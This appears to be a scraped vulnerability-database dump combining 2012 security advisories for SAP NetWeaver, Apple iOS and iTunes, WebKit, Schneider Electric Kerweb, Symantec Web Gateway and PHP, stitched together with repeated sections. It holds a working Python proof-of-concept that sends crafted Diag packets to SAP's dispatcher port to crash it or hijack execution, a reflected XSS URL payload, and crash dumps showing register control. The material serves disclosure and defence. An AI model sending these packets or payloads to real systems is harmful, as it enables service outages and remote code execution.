"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff "
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module processes a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
9. *Report Timeline*
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
. 2012-01-24:
Core sends an advisory draft with technical details.
. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline.
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
. 2012-02-21:
First release date missed.
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
. 2012-05-07:
Core asks again for the status of the fix.
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
. 2012-05-08:
Advisory CORE-2012-0123 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201205-0129 | CVE-2012-2511 |
SAP NetWeaver of DiagTraceAtoms Service disruption in functions ( Daemon crash ) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application.
----------------------------------------------------------------------
TITLE:
SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA48980
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48980/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE:
2012-05-09
DESCRIPTION:
Core Security Technologies has reported multiple vulnerabilities in
SAP NetWeaver, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
PROVIDED AND/OR DISCOVERED BY:
Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
1. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
                  default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number",
                  default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff "
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module processes a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
| VAR-201205-0407 | CVE-2012-0674 | Apple iOS of Safari In the location bar URL Forged vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the location bar's URL via a crafted web site. Apple Safari is a web browser developed by Apple and is the default browser included with the Mac OS X and iOS operating systems. The vulnerability exists in versions of Safari prior to Apple iOS 5.1.1.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update
iOS 5.1.1 Software Update is now available and addresses the
following:
Safari
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A maliciously crafted website may be able to spoof the
address in the location bar
Description: A URL spoofing issue existed in Safari. This could be
used in a malicious web site to direct the user to a spoofed site
that visually appeared to be a legitimate domain. This issue is
addressed through improved URL handling. This issue does not affect
OS X systems.
CVE-ID
CVE-2012-0674 : David Vieira-Kurz of MajorSecurity
(majorsecurity.net)
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: Multiple cross-site scripting issues existed in WebKit.
CVE-ID
CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest
CVE-2011-3056 : Sergey Glazunov
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in WebKit.
CVE-ID
CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome
Security Team
Installation note:
This update is only available through iTunes, and will not appear
in your computer's Software Update application, or in the Apple
Downloads site. Make sure you have an Internet connection and have
installed the latest version of iTunes from www.apple.com/itunes/
iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When
the iPhone, iPod touch or iPad is docked, iTunes will present the
user with the option to install the update. We recommend applying
the update immediately if possible. Selecting Don't Install will
present the option the next time you connect your iPhone, iPod touch,
or iPad.
The automatic update process may take up to a week depending on the
day that iTunes checks for updates. You may manually obtain the
update via the Check for Updates button within iTunes. After doing
this, the update can be applied when your iPhone, iPod touch, or iPad
is docked to your computer.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "5.1.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201205-0406 | CVE-2012-0672 | Apple Product WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit in Apple iOS before 5.1.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. WebKit is prone to an unspecified memory-corruption vulnerability.
An attacker can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage with a vulnerable application.
Very few technical details are currently available. We will update this BID when more information emerges. iTunes is a free application for your Mac or PC. It lets you organize and play digital music and video on your computer. It can automatically download new music, app, and book purchases across all your devices and computers. And it’s a store that has everything you need to be entertained. Anywhere. a specially crafted .M3U file. Successful exploitation could allow execution of arbitrary code on the affected node.
--------------------------------------------------------------------------------
(940.fc0): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
<unloaded_card.dll>+0x41414130:
41414141 ?? ???
~~~
(6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????
--------------------------------------------------------------------------------
Tested on: Microsoft Windows XP Professional SP3 EN (32bit), Microsoft Windows 7 Ultimate SP1 EN (64bit).
WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple, and Google, and is currently used by browsers such as Apple Safari and Google Chrome.
Vulnerabilities exist in WebKit versions prior to Apple iOS 5.1.1.
============================================================================
Ubuntu Security Notice USN-1524-1
August 08, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.1-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.1-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.1-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.1-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1524-1
CVE-2011-3046, CVE-2011-3050, CVE-2011-3067, CVE-2011-3068,
CVE-2011-3069, CVE-2011-3071, CVE-2011-3073, CVE-2011-3074,
CVE-2011-3075, CVE-2011-3078, CVE-2012-0672, CVE-2012-3615,
CVE-2012-3655, CVE-2012-3656, CVE-2012-3680, https://launchpad.net/bugs/1027283
Package Information:
https://launchpad.net/ubuntu/+source/webkit/1.8.1-0ubuntu0.12.04.1
----------------------------------------------------------------------
TITLE:
Apple iTunes Two Vulnerabilities
SECUNIA ADVISORY ID:
SA49489
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49489/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49489
RELEASE DATE:
2012-06-12
DESCRIPTION:
Apple has reported two vulnerabilities in Apple iTunes, which can be
exploited by malicious people to compromise a user's system.
1) An error in the handling of .m3u playlists can be exploited to
cause a heap-based buffer overflow via a specially crafted M3U
(".m3u") file.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Gjoko Krstic, Zero Science Lab.
ORIGINAL ADVISORY:
Apple:
http://support.apple.com/kb/HT5318
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update
iOS 5.1.1 Software Update is now available and addresses the
following:
Safari
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A maliciously crafted website may be able to spoof the
address in the location bar
Description: A URL spoofing issue existed in Safari. This could be
used in a malicious web site to direct the user to a spoofed site
that visually appeared to be a legitimate domain. This issue is
addressed through improved URL handling. This issue does not affect
OS X systems.
CVE-ID
CVE-2012-0674 : David Vieira-Kurz of MajorSecurity
(majorsecurity.net)
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: Multiple cross-site scripting issues existed in WebKit.
CVE-ID
CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest
CVE-2011-3056 : Sergey Glazunov
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in WebKit.
CVE-ID
CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome
Security Team
Installation note:
This update is only available through iTunes, and will not appear
in your computer's Software Update application, or in the Apple
Downloads site. Make sure you have an Internet connection and have
installed the latest version of iTunes from www.apple.com/itunes/
iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When
the iPhone, iPod touch or iPad is docked, iTunes will present the
user with the option to install the update. We recommend applying
the update immediately if possible. Selecting Don't Install will
present the option the next time you connect your iPhone, iPod touch,
or iPad.
The automatic update process may take up to a week depending on the
day that iTunes checks for updates. You may manually obtain the
update via the Check for Updates button within iTunes. After doing
this, the update can be applied when your iPhone, iPod touch, or iPad
is docked to your computer.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "5.1.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
.
CVE-ID
CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome
Security Team
WebKit
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7.4, OS X Lion Server v10.7.4, Windows 7, Vista,
XP SP2 or later
Impact: A maliciously crafted website may be able to populate form
inputs on another website with arbitrary values
Description: A state tracking issue existed in WebKit's handling of
forms.
CVE-ID
CVE-2012-0676 : Andreas Akre Solberg of UNINETT AS, Aaron Roots of
Deakin University ITSD, Tyler Goen
Note: In addition, this update disables Adobe Flash Player if it
is older than 10.1.102.64 by moving its files to a new directory.
This update presents the option to install an updated version of
Flash Player from the Adobe website
| VAR-201205-0119 | CVE-2012-1990 |
Schneider Electric Kerweb and Kerwin Vulnerable to cross-site scripting
Related entries in the VARIoT exploits database: VAR-E-201205-0174 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric Kerweb before 3.0.1 and Kerwin before 6.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the evtvariablename parameter in an evts.xml action to kw.dll, (2) unspecified search fields, or (3) unspecified content-display fields. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The kw.dll component provided by Schneider Electric Telecontrol Kerwin/Kerweb fails to properly filter the 'evtvariablename' parameter and other inputs, so an attacker can exploit the vulnerability for HTML injection: building malicious web pages and enticing users to open them in order to obtain sensitive information or hijack user sessions. Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
The following products are affected:
Schneider Electric Telecontrol Kerweb versions prior to 3.0.1
Schneider Electric Telecontrol Kerwin versions prior to 6.0.1.
Thus, the web application suffers from multiple reflected XSS vulnerabilities.
Exploitation is made easier as parameters are passed with GET HTTP method.
Example:
A URL can be forged by injecting code in one of the parameters, like 'evtvariablename' here:
http://<server>/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename="</script><script>alert(1)</script>"&evtdevicename=&evtnature=&evttype=&gtduration=&ltduration=&gtdurationvalue=&gtdurationwide=1&ltdurationvalue=&ltdurationwide=1
Vendor status:
Vendor was contacted and a fix was released (with Kerweb 3.0.1 and Kerwin 6.0.1)
Mitigation:
Upgrade to Kerweb 3.0.1 and Kerwin 6.0.1
CVE:
CVE-2012-1990
Timeline:
06/20/2011: vendor disclosure (ticket reference : KN10915)
07/22/2011: vendor response
09/01/2012: fix released
05/05/2012: public disclosure
--- phocean
TITLE:
Schneider Electric Kerwin Cross-Site Scripting Vulnerabilities
SECUNIA ADVISORY ID:
SA49041
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49041/
RELEASE DATE:
2012-05-10
DESCRIPTION:
phocean has reported some vulnerabilities in Kerwin, which can be
exploited by malicious people to conduct cross-site scripting
attacks.
1) Input passed via the "evtvariablename" parameter to kw.dll is not
properly sanitised before being returned to the user.
2) Certain input used for searching and displaying content is not
properly sanitised before being returned to the user.
SOLUTION:
Reportedly fixed in version 6.0.1.
PROVIDED AND/OR DISCOVERED BY:
phocean
ORIGINAL ADVISORY:
http://www.phocean.net/2012/05/08/cve-2012-1990-kerwebkerwin-xss-vulnerabilities.html
| VAR-201205-0219 | CVE-2012-0296 | Symantec Web Gateway Cross-site scripting vulnerability in the UI |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
TITLE:
Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49216
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49216/
RELEASE DATE:
2012-05-18
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway,
which can be exploited by malicious people to disclose potentially
sensitive information, conduct cross-site scripting attacks,
manipulate certain data, and compromise a vulnerable system.
1) An unspecified error can be exploited to inject arbitrary
commands. No further information is currently available.
2) Certain unspecified input is not properly verified before being
used to include files. This can be exploited to include arbitrary
files from local or external resources.
3) Certain unspecified input is not properly verified before being
used to download or delete arbitrary files. This can be exploited to
remove or disclose the contents of arbitrary files.
4) Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerabilities are reported in versions prior to 5.0.3.
SOLUTION:
Update to version 5.0.3.
PROVIDED AND/OR DISCOVERED BY:
1-3) The vendor credits Tenable Network Security via ZDI and an
anonymous person via SecuriTeam Secure Disclosure.
4) The vendor credits Ajay Pal Singh Atwal and an anonymous person.
ORIGINAL ADVISORY:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00
| VAR-201205-0311 | CVE-2012-2335 | PHP of php-wrapper.fcgi Vulnerabilities that bypass protection mechanisms |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence. PHP is prone to an information-disclosure vulnerability.
Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: PHP: Multiple vulnerabilities
Date: September 24, 2012
Bugs: #384301, #396311, #396533, #399247, #399567, #399573,
#401997, #410957, #414553, #421489, #427354, #429630
ID: 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in PHP, the worst of which lead to
remote execution of arbitrary code.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Affected packages
=================
-------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------
  1  dev-lang/php                 < 5.3.15                  >= 5.3.15
                                  < 5.4.5                    >= 5.4.5
-------------------------------------------------------------------
# Package 1 only applies to users of these architectures:
arm
Description
===========
